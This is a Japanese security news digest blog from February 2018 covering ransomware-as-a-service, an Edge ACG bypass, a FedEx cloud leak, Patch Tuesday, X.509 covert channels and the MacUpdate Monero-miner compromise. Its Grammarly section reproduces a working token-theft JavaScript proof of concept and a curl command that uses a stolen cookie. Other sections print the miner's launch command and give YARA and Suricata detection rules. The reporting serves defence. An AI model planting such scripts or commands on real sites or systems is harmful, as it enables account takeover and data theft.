2018-02-19 セキュリティニュースまとめ: Saturn RaaS (Ransomeware as a Service) が前金不要で無料のビジネスモデルを採用、GrandCrab ランサムウェアもランサムウェアのアフィリエイトサービス市場に参入
Saturn RaaS (Ransomeware as a Service) が前金不要で無料のビジネスモデルを採用、GrandCrab ランサムウェアもランサムウェアのアフィリエイトサービス市場に参入
元記事
概要
前金不要の新しいビジネスモデル
- Saturn という名で呼ばれるランサムウェアをアフィリエイト サービスとして提供するポータルサイトがダークウェブで新たに発見される
- これまでの主な RaaS とは異なるビジネスモデルを採用している
- 感染した被害者は su34pwhpcafeiztt[.]onion にアクセスして「身代金」を支払う
- 支払われた身代金はポータルサイト作成者の Bitcoin アカウントに送信され、スタブファイルを生成した登録ユーザーが身代金の 70%、ポータルサイト側が 30% を受け取るようになっている
- 7:3 のモデルは他の Cerber を利用した RaaS ビジネスモデルと同等
ランサムウェア GandCrab も RaaS で提供開始
- ペルーのセキュリティリサーチャー David Montenegro 氏が GrandCrab ランサムウェアも RaaS モデルに参入したことを発見
- ロシア語を話すユーザーの集う悪名高いフォーラムで売り出されていた
GandCrab Ransomware 28.01.2018 - Thanks to a Cyber criminal who registered your access in his own AZORutl I was able to login in the Underground forum where I found this information about GandCrab Ransomware .. 🧐🧐 .. RaaS GandCrab .. 🕵️♂️🕵️♂️ pic.twitter.com/INPdatqufr
— David Montenegro (@CryptoInsane) 2018年2月1日
2018-02-18 セキュリティニュースまとめ: Microsoft Edge にメモリ保護機能 ACG (Arbitrary Code Guard) をバイパス可能な脆弱性
Microsoft Edge にメモリ保護機能 ACG (Arbitrary Code Guard) をバイパス可能な脆弱性
ソース
- Google (一次情報): 1435 - Microsoft Edge: ACG bypass using UnmapViewOfFile - project-zero - Monorail
- Microsoft: Mitigating arbitrary native code execution in Microsoft Edge - Microsoft Edge Dev BlogMicrosoft Edge Dev Blog
- BleepingComputer: Google Discloses Microsoft Edge Security Feature Bypass
概要
- Microsoft Edge Web ブラウザは、悪意のあるネイティブコードを実行されないため、次の 2 種類のメモリ保護機能を用意しているが、このうち ACG についてバイパスする方法を Google のセキュリティリサーチャーが発見し Microsoft のセキュリティ レスポンス センターに報告
- Code Integrity Guard (CIG): 適切に署名されたコードのみを実行する
- Arbitrary Code Guard (ACG): コードを動的に生成・変更させない
- 同脆弱性は 90 日間の猶予期間を経過し、修正が間に合わなかったため公開された
- Microsoft 社の見込みでは修正を 2018 年 3 月頃にリリース予定
CVE
2018-02-16 セキュリティニュースまとめ: Amazon S3 にパスワード保護なしで保存されていた FedEx の顧客情報が漏えい
Amazon S3 にパスワード保護なしで保存されていた FedEx の顧客情報が漏えい
元記事
概要
- パスワード保護すらない状態で Amazon S3 ストレージサーバー上に FedEx 顧客情報が放置されており、個人の ID カード、履歴書、請求書などが含まれていた
- 漏えいしたファイル数は 119,000 件以上。ストレージクラウド利用上のサイバー衛生問題が浮き彫りに
- クラウドストレージ上に保存したデータをセキュリティへの認識不足が原因で漏えいさせた企業は他にも多数
- いずれの企業もセキュリティを考慮しない設定ミスが漏えいの原因
- 最初の報告者は Kromtech 社のセキュリティリサーチャー
- クラウド化を推進したいあまり、サービスが提供しているセキュリティ設定やその限界について意識することなく利用してしまう企業が多い
詳細
- 漏えいを引き起こした会社は 2014 年に FedEx が買収した Bongo という子会社で、発送料を計算するサービスを提供している
- 漏えいしたファイル数は 119,000 またはそれ以上
- 発送料を計算するというサービスの性質上、顧客は住所情報に加えて身分証明に関する情報を提供しており、こうした情報がストレージ上に放置されていた
- 漏えいしたレコードに含まれていた顧客の居住地域は、米国、アジア、オーストラリア、ヨーロッパ、中東
- 漏えいした情報の修理は運転免許証、勤務先の ID カード、請求書、投票カード、履歴書、保険証、クレジットカード、各国軍関係者の ID カードなど
- 「サンプリングされた軍関係者の ID の情報から、オランダ国防省の上級職員に関する詳細情報を確認できた」
- 漏えいしたデータの期間は 2008 年 ~ 2015 年まで
- ZDNet から FeDex へ当該インシデントについては連絡がなされ、ただちにデータは保護された
2018-02-14 セキュリティニュースまとめ: Microsoft 月例セキュリティ更新プログラム公開 (Patch Tuesday)、管理者向けに Meltdown / Spectre の影響の評価ツールを配布
Microsoft 月例セキュリティ更新プログラム公開 (Patch Tuesday)
ソース
- Microsoft February Patch Tuesday Fixes 50 Security Issues https://www.bleepingcomputer.com/news/microsoft/microsoft-february-patch-tuesday-fixes-50-security-issues/
- TWO NASTY OUTLOOK BUGS FIXED IN MICROSOFT’S FEB. PATCH TUESDAY UPDATE https://threatpost.com/two-nasty-outlook-bugs-fixed-in-microsofts-feb-patch-tuesday-update/129931/
- February 2018 Microsoft (and Adobe) Patch Tuesday https://isc.sans.edu/diary.html
- 2018 年 2 月のセキュリティ更新プログラム (月例) https://blogs.technet.microsoft.com/jpsecurity/2018/02/14/201802-security-updates/
とくに重要とかんがえられる更新
- 2018-02-06 に修正・配布された Adobe Flash Player のゼロデイ (すでに攻撃・悪用例が確認されている) が月例でも配布された
- Microsoft Outlook のローカルユーザーの権限で任意のコードが実行されうる 2 つの脆弱性が修正された
- 攻撃ベクターがプレビュー ペインであり、添付ファイルをプレビューしただけで攻撃が実行されることから影響度が「深刻」と区分された
- Windows Server 2008 の StructuredQuery に存在するリモートからコードを実行される脆弱性が修正された
Microsoft、管理者向けに Meltdown / Spectre の影響の評価ツールを無料の Windows Analytics サービスに追加して配布
ソース
- Windows Analytics now helps assess Meltdown and Spectre protections - Windows For Your BusinessWindows For Your Business
- Microsoft delivers free Meltdown-Spectre assessment tool for IT pros | ZDNet
概要
- Microsoft が提供する Windows Analytics サービスに Spectre/Meltdown 脆弱性によって受ける影響を査定するためのツールが加わった
- IT 管理者はこのツールを利用することで自組織管理下にある全 Windows デバイスの同脅威からうける影響を包括的把握できる
同ツールにより提供される機能
2018-02-06: セキュリティニュースまとめ: Chrome 機能拡張「Grammerly」に全 web サイトに対し Auth トークンをアクセス可能にする脆弱性
一次ソース
1527 - Grammarly: auth tokens are accessible to all websites - project-zero - Monorail
Grammerly Chrome 機能拡張について: 参考情報
lifeiscolourful.hatenablog.com
- grammerly.com は英文ファイルをアップロードすると文法チェックしてくれるサービス
- Chrome 機能拡張を利用すると、別のサイトでリアルタイムに執筆中の英文の文法チェックをしてくれる
- 例: 任意のサイトに英文を入力中、Chrome 機能拡張でリアルタイムに文法間違いを指摘するなど
- Grammerly Chrome 機能拡張のユーザー数: 約 2200 万人
確認された問題
- 発見日: 2018-02-02
- 修正確認日: 2018-02-06
- Grammerly 機能拡張は Auth トークンを全 web サイトに晒している
再現方法
任意の web サイト (例えば example.com) 上で Chrome のデベロッパーツールにアクセスし、コンソールに下記を入力して grammerly の auth トークンを取得すれば良い。ここではコンソールからスクリプトを入力しているが、実際にはその web サイトの script セクションに同じスクリプトを仕掛けておけばユーザによる入力は必要ない。
> document.body.contentEditable=true // Trigger grammarly > document.querySelector("[data-action=editor]").click() // Click the editor button > document.querySelector("iframe.gr_-ifr").contentWindow.addEventListener("message", function (a) { console.log(a.data.user.email, a.data.user.grauth); }) // log auth token and email > window.postMessage({grammarly: 1, action: "user" }, "*") // Request user data
これにより以下のようなアウトプットが得られる。
testaccount.zzxxyyaa@gmail.com AABEnOZHVclnIAvUTKa4yc1waRRf59-hY3dVDT0gvrDfcJDAFt3Nlq84LpWFpzH1tkxzqs
grauth トークンは gammerly.com で利用されている grauth クッキーと合致しており grammerly.com アカウントのログインするのに十分な情報である。 これで Grammerly ユーザーのアカウントにあるすべての文書にアクセスできる。
たとえば以下の curl コマンドでアップロードされている全ドキュメントを取得できる。
$ curl --cookie "grauth=AABEnOZHVclnIAvUTKa4yc1waRRf59-hY3dVDT0gvrDfcJDAFt3Nlq84LpWFpzH1tkxzqs;" -A Mozilla -si 'https://dox.grammarly.com/documents?search=&limit=100&firstCall=false' HTTP/2 200 date: Fri, 02 Feb 2018 20:42:51 GMT content-type: application/json;charset=utf-8 content-length: 438 server: nginx-clojure/0.4.5 x-xss-protection: 1; mode=block x-frame-options: DENY x-request-id: 1-5a74cd4b-1d54e8fe06dc94f47361216e x-content-type-options: nosniff content-security-policy: default-src 'none' strict-transport-security: max-age=31536000 vary: Accept-Encoding, User-Agent [{"id":260704145,"user_id":704607600,"title":"Demo document","size":3301,"first_content":"Remember when you were a careless eight year old kid riding a bike with your friends,racing each other around the neighborhood? Remember that feeling of absolute freedom as you felt the wind in your hair and the smile it put on your face? I never thought ","errors":41,"created_at":"2018-02-02T19:20:37.693","updated_at":"2018-02-02T19:21:04.268"}]
修正
2018-02-06 セキュリティニュースまとめ: X.509 デジタル証明書を秘密の通信路として悪用する方法が確認される
X.509 デジタル証明書を秘密の通信路として悪用する方法が確認される
一次ソース: Fidelis Cybersecurity
同社リサーチャーによる論文
Covert channel by abusing x509 extensions
本件に関する PoC (Github)
関連ニュース記事
参考情報
概要
- すでに侵害を受けた組織内から外部の C2 サーバーへ秘密の通信を行う方法として、X.509 デジタル証明書の拡張領域を悪用する方法が確認された
- TLS ハンドシェイク中、X.509 デジタル証明書の拡張領域を使って C2 サーバー宛のデータを送信することにより実際には TLS セッションを張らなくても C2 サーバーとデータを交換することができる
- 証明書に含まれる値を検査しないセキュリティ対策はバイパスされてしまう可能性がある
- Mimikatz を使った PoC
- この方法を利用する攻撃例の検知用 YARA ルールサンプルと YARA ルールを元にした Suricata の IDS Alert ルールサンプル
YARA ルールのサンプル
- 拡張領域の subjectKeyIdentifier (主体者鍵識別子) を利用した攻撃で 127 バイトより長い値をもつ主体者鍵識別子を検出する
rule abnormal_subjectkeyid { meta: author = "Jason Reaves" strings: $shortlens = /\x06\x03\x55\x1d\x0e\x04.\x04[^\x08\x10\x14\x20\x30\x40]/ $longlens = {06 03 55 1d 0e 04 8?} condition: any of them }
Suricata IDS アラートのルールサンプル
- 拡張領域の subjectKeyIdentifier (主体者鍵識別子) を利用した攻撃で 127 バイトより長い値をもつ主体者鍵識別子を検出する YARA ルールを Suricata のルールに変換
alert tcp any any -> any any ( msg:"Abnormal x509v3 SubjectKeyIdentifier extension"; dsize:>768; content: "|16 03|"; depth:2; content:"|06 03 55 1d 0e 04|"; offset:0x150; pcre:"/\x06\x03\x55\x1d\x0e\x04.\x04[^\x08\x10\x14\x20\x30\x40]/"; classtype:misc-attack; sid:1000001; rev:1;)
まとめ
- C2 サーバーへの秘密の通信路として X.509 の拡張領域を利用すると、ネットワーク境界に配備したセキュリティ機能が検出できない場合がある
- 標準から逸脱したデジタル証明書を検出することで、こうした秘密の通信路を検出しうる
2018-02-04: セキュリティニュースまとめ: ソフトウェア ダウンロード アグレゲーション サービス サイト MacUpdate で侵害、Monero マイナー入りアプリケーションが配信される
ソフトウェア ダウンロード アグレゲーション サービス サイト MacUpdate で侵害、Monero マイナー入りアプリケーションが配信される
元記事 MalwwareBytes Labs
概要
- インシデントの確認日: 2018-02-01
- MacUpdate がセキュリティ侵害を受け、同サービスが配信するソフトウェアに暗号通貨 Monero の採掘 (マイニング) 用スクリプトが埋め込まれて配信される
- MacUpdate は正規のソフトウェアデベロッパの配信サービスを取りまとめて一覧表示するいわゆる「ダウンロードアグレゲーション」サービスを提供しているサイト
発生した侵害内容
- MacUpdate サイトが参照する各正規サイトの URL が書き換えられ、悪意のあるソフトウェアがダウンロードされる
正規ドメイン | 偽ドメイン |
---|---|
titanium-software.fr | titaniumsoftware[.]org |
mozilla.net | cdn-mozilla[.]net |
同サービスから配信された感染アプリケーション
感染機序
- 侵害を受けたサイト上でユーザーが偽ドメインを開き、ユーザーがダウンロードしようとしたソフトウェア(以降この正規ソフトウェア部分を指して「おとり」)を同梱した感染済みソフトウェア(以降この部分を指して「悪意のあるスクリプト」)をダウンロード
- 「悪意のあるスクリプト」は「おとり」に似せて作られた *.dmg ファイルで、自身をアプリケーションフォルダにドラッグ & ドロップしてインストールするようユーザーに促す
- ユーザーがインストールした「悪意のあるスクリプト」を開くとマルウェアのペイロードが Adobe が保有する正規ドメインの public.adobecc.com からダウンロードされる
- 「悪意のあるスクリプト」は続いて同梱していた「おとり」を開き、ユーザーがダウンロードしたつもりの正規ソフトウェアが正常に起動されたように装う
- 「悪意のあるスクリプト」はダウンロードしたマルウェアのペイロードをユーザーの /Library フォルダ以下に展開し、MacOSupdate.plist というファイルをインストールして定期的にこのスクリプトを実行させるためのローンチエージェントを登録する
- MacOSupdate.plist が実行されると、新しい MacOS.plist がダウンロードされて MacOSupdate.plist に置換される
- MacOS.plist が悪意のある sysmdworker プロセスをロードする:
sh -c ~/Library/mdworker/sysmdworker -user walker18[@]protonmail.ch -xmr
- sysmdworker が Monero のマイニングを行うマルウェア本体で、minergate-cli というコマンドラインツールで採掘を行い、定期的に minergate[.]com に、上記の引数に指定されているメールアドレス walker18[@]protonmail.ch でログインする
本マルウェアの特徴
- 感染 Onyx の動作要件は MacOS 10.7 とそれ以降だが、正規の Onyx は MacOS 10.13 以降でのみ動作する。したがって MacOS 10.7 より新しく MacOS 10.13 より古いシステム上で感染した Onyx をインストールして実行した場合、マルウェア部分のみが起動するものの「おとり」部分が起動できない。これにより、MacOS 10.3 より古いシステムを利用しているユーザーは、ソフトウェアに問題が発生していることに気づくチャンスがある。
- 感染 Deeper の場合、攻撃者は同梱ソフトウェアを間違え、おとり部分に Deeper の代わりに Onyx を同梱してしまっている。このため、Deeper をインストールしたら Onyx が起動する結果となる。やはりここでも問題が発生していることに気づくチャンスがある。
まとめ
- ダウンロード アグレゲーション サービスは利用しない。正規サイトが侵害されないわけではないが、アグレゲーションサイトは格段に侵害リスクが高い。こうしたサービス提供者自身がマルウェアやアドウェアなどを正規ソフトウェアに同梱する場合もあるし、セキュリティ上の問題が多い。
- 正規のソフトウェア開発者からダウンロードする場合でも、ソフトウェアの評価やレビュー数を常に意識する。極端に評価の低いソフトウェアやレビュー数の少ないソフトウェアを利用しない。
- ダウンロードしたソフトウェアが起動しない、CPU 使用率が 100% に張り付いたままになるなど意図したように動作しない状況に気づいたら何か問題が発生している可能性があると疑い、システム全体をセキュリティソフトウェアでスキャンする
- 最後に「Mac はウイルスに感染しない」という馬鹿げた都市伝説を信じてはいけない